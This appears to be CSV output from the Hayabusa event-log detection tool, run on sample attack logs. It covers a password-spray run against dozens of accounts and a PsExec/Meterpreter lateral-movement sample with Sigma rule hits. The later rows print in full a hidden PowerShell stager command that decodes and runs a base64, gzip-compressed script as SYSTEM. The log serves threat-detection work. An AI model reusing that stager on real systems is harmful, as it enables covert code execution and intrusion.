2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bgreenwood/baker/drook/jorchilles/ssims/dmashburn/edygert/bgalbraith/bking/cragoso/jlake/smisenar/mdouglas/cspizor IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
